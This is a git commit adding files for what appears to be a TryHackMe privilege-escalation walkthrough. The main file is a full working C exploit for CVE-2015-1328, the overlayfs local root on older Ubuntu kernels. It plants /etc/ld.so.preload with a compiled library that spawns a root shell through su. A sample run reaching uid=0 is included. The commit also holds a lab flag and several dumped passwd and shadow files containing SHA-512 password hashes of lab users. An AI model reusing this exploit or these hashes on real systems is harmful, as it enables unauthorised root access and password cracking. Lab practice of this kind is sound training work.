initial commit
This commit is contained in:
152
Walkthroughs/IntroToShell/exploit.c
Normal file
152
Walkthroughs/IntroToShell/exploit.c
Normal file
@@ -0,0 +1,152 @@
|
||||
/*
|
||||
# Exploit Title: ofs.c - overlayfs local root in ubuntu
|
||||
# Date: 2015-06-15
|
||||
# Exploit Author: rebel
|
||||
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
|
||||
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
|
||||
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
|
||||
|
||||
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||
CVE-2015-1328 / ofs.c
|
||||
overlayfs incorrect permission handling + FS_USERNS_MOUNT
|
||||
|
||||
user@ubuntu-server-1504:~$ uname -a
|
||||
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
|
||||
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
|
||||
user@ubuntu-server-1504:~$ id
|
||||
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
|
||||
user@ubuntu-server-1504:~$ ./ofs
|
||||
spawning threads
|
||||
mount #1
|
||||
mount #2
|
||||
child threads done
|
||||
/etc/ld.so.preload created
|
||||
creating shared library
|
||||
# id
|
||||
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
|
||||
|
||||
greets to beist & kaliman
|
||||
2015-05-24
|
||||
%rebel%
|
||||
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/mount.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/mount.h>
|
||||
#include <sys/types.h>
|
||||
#include <signal.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
#include <linux/sched.h>
|
||||
|
||||
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
|
||||
|
||||
static char child_stack[1024*1024];
|
||||
|
||||
static int
|
||||
child_exec(void *stuff)
|
||||
{
|
||||
char *file;
|
||||
system("rm -rf /tmp/ns_sploit");
|
||||
mkdir("/tmp/ns_sploit", 0777);
|
||||
mkdir("/tmp/ns_sploit/work", 0777);
|
||||
mkdir("/tmp/ns_sploit/upper",0777);
|
||||
mkdir("/tmp/ns_sploit/o",0777);
|
||||
|
||||
fprintf(stderr,"mount #1\n");
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
|
||||
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
|
||||
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
|
||||
exit(-1);
|
||||
}
|
||||
file = ".access";
|
||||
chmod("/tmp/ns_sploit/work/work",0777);
|
||||
} else file = "ns_last_pid";
|
||||
|
||||
chdir("/tmp/ns_sploit/o");
|
||||
rename(file,"ld.so.preload");
|
||||
|
||||
chdir("/");
|
||||
umount("/tmp/ns_sploit/o");
|
||||
fprintf(stderr,"mount #2\n");
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
|
||||
exit(-1);
|
||||
}
|
||||
chmod("/tmp/ns_sploit/work/work",0777);
|
||||
}
|
||||
|
||||
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
|
||||
umount("/tmp/ns_sploit/o");
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
int status, fd, lib;
|
||||
pid_t wrapper, init;
|
||||
int clone_flags = CLONE_NEWNS | SIGCHLD;
|
||||
|
||||
fprintf(stderr,"spawning threads\n");
|
||||
|
||||
if((wrapper = fork()) == 0) {
|
||||
if(unshare(CLONE_NEWUSER) != 0)
|
||||
fprintf(stderr, "failed to create new user namespace\n");
|
||||
|
||||
if((init = fork()) == 0) {
|
||||
pid_t pid =
|
||||
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
|
||||
if(pid < 0) {
|
||||
fprintf(stderr, "failed to create new mount namespace\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
waitpid(pid, &status, 0);
|
||||
|
||||
}
|
||||
|
||||
waitpid(init, &status, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
usleep(300000);
|
||||
|
||||
wait(NULL);
|
||||
|
||||
fprintf(stderr,"child threads done\n");
|
||||
|
||||
fd = open("/etc/ld.so.preload",O_WRONLY);
|
||||
|
||||
if(fd == -1) {
|
||||
fprintf(stderr,"exploit failed\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stderr,"/etc/ld.so.preload created\n");
|
||||
fprintf(stderr,"creating shared library\n");
|
||||
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
|
||||
write(lib,LIB,strlen(LIB));
|
||||
close(lib);
|
||||
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
|
||||
if(lib != 0) {
|
||||
fprintf(stderr,"couldn't create dynamic library\n");
|
||||
exit(-1);
|
||||
}
|
||||
write(fd,"/tmp/ofs-lib.so\n",16);
|
||||
close(fd);
|
||||
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
|
||||
execl("/bin/su","su",NULL);
|
||||
}
|
||||
1
Walkthroughs/IntroToShell/flag3.txt
Normal file
1
Walkthroughs/IntroToShell/flag3.txt
Normal file
@@ -0,0 +1 @@
|
||||
THM-3847834
|
||||
36
Walkthroughs/IntroToShell/passwd
Normal file
36
Walkthroughs/IntroToShell/passwd
Normal file
@@ -0,0 +1,36 @@
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
|
||||
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
|
||||
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
|
||||
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
|
||||
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
|
||||
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
|
||||
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
|
||||
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
|
||||
pollinate:x:111:1::/var/cache/pollinate:/bin/false
|
||||
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
|
||||
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
|
||||
karen:x:1001:1001::/home/karen:/bin/sh
|
||||
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
|
||||
matt:x:1002:1002::/home/matt:/bin/sh
|
||||
37
Walkthroughs/IntroToShell/passwd.txt
Normal file
37
Walkthroughs/IntroToShell/passwd.txt
Normal file
@@ -0,0 +1,37 @@
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
|
||||
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
|
||||
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
|
||||
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
|
||||
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
|
||||
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
|
||||
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
|
||||
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
|
||||
pollinate:x:111:1::/var/cache/pollinate:/bin/false
|
||||
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
|
||||
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
|
||||
gerryconway:x:1001:1001::/home/gerryconway:/bin/sh
|
||||
user2:x:1002:1002::/home/user2:/bin/sh
|
||||
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
|
||||
karen:x:1003:1003::/home/karen:/bin/sh
|
||||
36
Walkthroughs/IntroToShell/password1.txt
Normal file
36
Walkthroughs/IntroToShell/password1.txt
Normal file
@@ -0,0 +1,36 @@
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
|
||||
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
|
||||
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
|
||||
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
|
||||
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
|
||||
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
|
||||
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
|
||||
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
|
||||
pollinate:x:111:1::/var/cache/pollinate:/bin/false
|
||||
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
|
||||
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
|
||||
karen:x:1001:1001::/home/karen:/bin/sh
|
||||
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
|
||||
matt:x:1002:1002::/home/matt:/bin/sh
|
||||
37
Walkthroughs/IntroToShell/passwords.txt
Normal file
37
Walkthroughs/IntroToShell/passwords.txt
Normal file
@@ -0,0 +1,37 @@
|
||||
root:*:0:0:root:/root:/bin/bash
|
||||
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:*:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:*:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:*:4:65534:sync:/bin:/bin/sync
|
||||
games:*:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:*:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:*:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-timesync:*:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:*:103:106::/nonexistent:/usr/sbin/nologin
|
||||
syslog:*:104:110::/home/syslog:/usr/sbin/nologin
|
||||
_apt:*:105:65534::/nonexistent:/usr/sbin/nologin
|
||||
tss:*:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
|
||||
uuidd:*:107:112::/run/uuidd:/usr/sbin/nologin
|
||||
tcpdump:*:108:113::/nonexistent:/usr/sbin/nologin
|
||||
sshd:*:109:65534::/run/sshd:/usr/sbin/nologin
|
||||
landscape:*:110:115::/var/lib/landscape:/usr/sbin/nologin
|
||||
pollinate:*:111:1::/var/cache/pollinate:/bin/false
|
||||
ec2-instance-connect:!:112:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-coredump:!!:999:999:systemd Core Dumper:/:/usr/sbin/nologin
|
||||
ubuntu:!:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
|
||||
gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:1001:1001::/home/gerryconway:/bin/sh
|
||||
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
|
||||
lxd:!:998:100::/var/snap/lxd/common/lxd:/bin/false
|
||||
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/home/karen:/bin/sh
|
||||
36
Walkthroughs/IntroToShell/passwords1.txt
Normal file
36
Walkthroughs/IntroToShell/passwords1.txt
Normal file
@@ -0,0 +1,36 @@
|
||||
root:*:0:0:root:/root:/bin/bash
|
||||
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:*:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:*:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:*:4:65534:sync:/bin:/bin/sync
|
||||
games:*:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
||||
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:*:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:*:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-timesync:*:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:*:103:106::/nonexistent:/usr/sbin/nologin
|
||||
syslog:*:104:110::/home/syslog:/usr/sbin/nologin
|
||||
_apt:*:105:65534::/nonexistent:/usr/sbin/nologin
|
||||
tss:*:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
|
||||
uuidd:*:107:112::/run/uuidd:/usr/sbin/nologin
|
||||
tcpdump:*:108:113::/nonexistent:/usr/sbin/nologin
|
||||
sshd:*:109:65534::/run/sshd:/usr/sbin/nologin
|
||||
landscape:*:110:115::/var/lib/landscape:/usr/sbin/nologin
|
||||
pollinate:*:111:1::/var/cache/pollinate:/bin/false
|
||||
ec2-instance-connect:!:112:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-coredump:!!:999:999:systemd Core Dumper:/:/usr/sbin/nologin
|
||||
ubuntu:!:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
|
||||
karen:$6$ZC4srkt5HufYpAAb$GVDM6arO/qQU.o0kLOZfMLAFGNHXULH5bLlidB455aZkKrMvdB1upyMZZzqdZuzlJTuTHTlsKzQAbSZJr9iE21:1001:1001::/home/karen:/bin/sh
|
||||
lxd:!:998:100::/var/snap/lxd/common/lxd:/bin/false
|
||||
matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:1002:1002::/home/matt:/bin/sh
|
||||
37
Walkthroughs/IntroToShell/shadow.txt
Normal file
37
Walkthroughs/IntroToShell/shadow.txt
Normal file
@@ -0,0 +1,37 @@
|
||||
root:*:18561:0:99999:7:::
|
||||
daemon:*:18561:0:99999:7:::
|
||||
bin:*:18561:0:99999:7:::
|
||||
sys:*:18561:0:99999:7:::
|
||||
sync:*:18561:0:99999:7:::
|
||||
games:*:18561:0:99999:7:::
|
||||
man:*:18561:0:99999:7:::
|
||||
lp:*:18561:0:99999:7:::
|
||||
mail:*:18561:0:99999:7:::
|
||||
news:*:18561:0:99999:7:::
|
||||
uucp:*:18561:0:99999:7:::
|
||||
proxy:*:18561:0:99999:7:::
|
||||
www-data:*:18561:0:99999:7:::
|
||||
backup:*:18561:0:99999:7:::
|
||||
list:*:18561:0:99999:7:::
|
||||
irc:*:18561:0:99999:7:::
|
||||
gnats:*:18561:0:99999:7:::
|
||||
nobody:*:18561:0:99999:7:::
|
||||
systemd-network:*:18561:0:99999:7:::
|
||||
systemd-resolve:*:18561:0:99999:7:::
|
||||
systemd-timesync:*:18561:0:99999:7:::
|
||||
messagebus:*:18561:0:99999:7:::
|
||||
syslog:*:18561:0:99999:7:::
|
||||
_apt:*:18561:0:99999:7:::
|
||||
tss:*:18561:0:99999:7:::
|
||||
uuidd:*:18561:0:99999:7:::
|
||||
tcpdump:*:18561:0:99999:7:::
|
||||
sshd:*:18561:0:99999:7:::
|
||||
landscape:*:18561:0:99999:7:::
|
||||
pollinate:*:18561:0:99999:7:::
|
||||
ec2-instance-connect:!:18561:0:99999:7:::
|
||||
systemd-coredump:!!:18796::::::
|
||||
ubuntu:!:18796:0:99999:7:::
|
||||
gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:18796:0:99999:7:::
|
||||
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:18796:0:99999:7:::
|
||||
lxd:!:18796::::::
|
||||
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:18796:0:99999:7:::
|
||||
36
Walkthroughs/IntroToShell/shadow1.txt
Normal file
36
Walkthroughs/IntroToShell/shadow1.txt
Normal file
@@ -0,0 +1,36 @@
|
||||
root:*:18561:0:99999:7:::
|
||||
daemon:*:18561:0:99999:7:::
|
||||
bin:*:18561:0:99999:7:::
|
||||
sys:*:18561:0:99999:7:::
|
||||
sync:*:18561:0:99999:7:::
|
||||
games:*:18561:0:99999:7:::
|
||||
man:*:18561:0:99999:7:::
|
||||
lp:*:18561:0:99999:7:::
|
||||
mail:*:18561:0:99999:7:::
|
||||
news:*:18561:0:99999:7:::
|
||||
uucp:*:18561:0:99999:7:::
|
||||
proxy:*:18561:0:99999:7:::
|
||||
www-data:*:18561:0:99999:7:::
|
||||
backup:*:18561:0:99999:7:::
|
||||
list:*:18561:0:99999:7:::
|
||||
irc:*:18561:0:99999:7:::
|
||||
gnats:*:18561:0:99999:7:::
|
||||
nobody:*:18561:0:99999:7:::
|
||||
systemd-network:*:18561:0:99999:7:::
|
||||
systemd-resolve:*:18561:0:99999:7:::
|
||||
systemd-timesync:*:18561:0:99999:7:::
|
||||
messagebus:*:18561:0:99999:7:::
|
||||
syslog:*:18561:0:99999:7:::
|
||||
_apt:*:18561:0:99999:7:::
|
||||
tss:*:18561:0:99999:7:::
|
||||
uuidd:*:18561:0:99999:7:::
|
||||
tcpdump:*:18561:0:99999:7:::
|
||||
sshd:*:18561:0:99999:7:::
|
||||
landscape:*:18561:0:99999:7:::
|
||||
pollinate:*:18561:0:99999:7:::
|
||||
ec2-instance-connect:!:18561:0:99999:7:::
|
||||
systemd-coredump:!!:18798::::::
|
||||
ubuntu:!:18798:0:99999:7:::
|
||||
karen:$6$ZC4srkt5HufYpAAb$GVDM6arO/qQU.o0kLOZfMLAFGNHXULH5bLlidB455aZkKrMvdB1upyMZZzqdZuzlJTuTHTlsKzQAbSZJr9iE21:18798:0:99999:7:::
|
||||
lxd:!:18798::::::
|
||||
matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:18798:0:99999:7:::
|
||||
36
Walkthroughs/IntroToShell/test.txt
Normal file
36
Walkthroughs/IntroToShell/test.txt
Normal file
@@ -0,0 +1,36 @@
|
||||
root:*:18561:0:99999:7:::
|
||||
daemon:*:18561:0:99999:7:::
|
||||
bin:*:18561:0:99999:7:::
|
||||
sys:*:18561:0:99999:7:::
|
||||
sync:*:18561:0:99999:7:::
|
||||
games:*:18561:0:99999:7:::
|
||||
man:*:18561:0:99999:7:::
|
||||
lp:*:18561:0:99999:7:::
|
||||
mail:*:18561:0:99999:7:::
|
||||
news:*:18561:0:99999:7:::
|
||||
uucp:*:18561:0:99999:7:::
|
||||
proxy:*:18561:0:99999:7:::
|
||||
www-data:*:18561:0:99999:7:::
|
||||
backup:*:18561:0:99999:7:::
|
||||
list:*:18561:0:99999:7:::
|
||||
irc:*:18561:0:99999:7:::
|
||||
gnats:*:18561:0:99999:7:::
|
||||
nobody:*:18561:0:99999:7:::
|
||||
systemd-network:*:18561:0:99999:7:::
|
||||
systemd-resolve:*:18561:0:99999:7:::
|
||||
systemd-timesync:*:18561:0:99999:7:::
|
||||
messagebus:*:18561:0:99999:7:::
|
||||
syslog:*:18561:0:99999:7:::
|
||||
_apt:*:18561:0:99999:7:::
|
||||
tss:*:18561:0:99999:7:::
|
||||
uuidd:*:18561:0:99999:7:::
|
||||
tcpdump:*:18561:0:99999:7:::
|
||||
sshd:*:18561:0:99999:7:::
|
||||
landscape:*:18561:0:99999:7:::
|
||||
pollinate:*:18561:0:99999:7:::
|
||||
ec2-instance-connect:!:18561:0:99999:7:::
|
||||
systemd-coredump:!!:18796::::::
|
||||
ubuntu:!:18796:0:99999:7:::
|
||||
lxd:!:18796::::::
|
||||
karen:$6$QHTxjZ77ZcxU54ov$DCV2wd1mG5wJoTB.cXJoXtLVDZe1Ec1jbQFv3ICAYbnMqdhJzIEi3H4qyyKO7T75h4hHQWuWWzBH7brjZiSaX0:18796:0:99999:7:::
|
||||
frank:$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:7:::
|
||||
Reference in New Issue
Block a user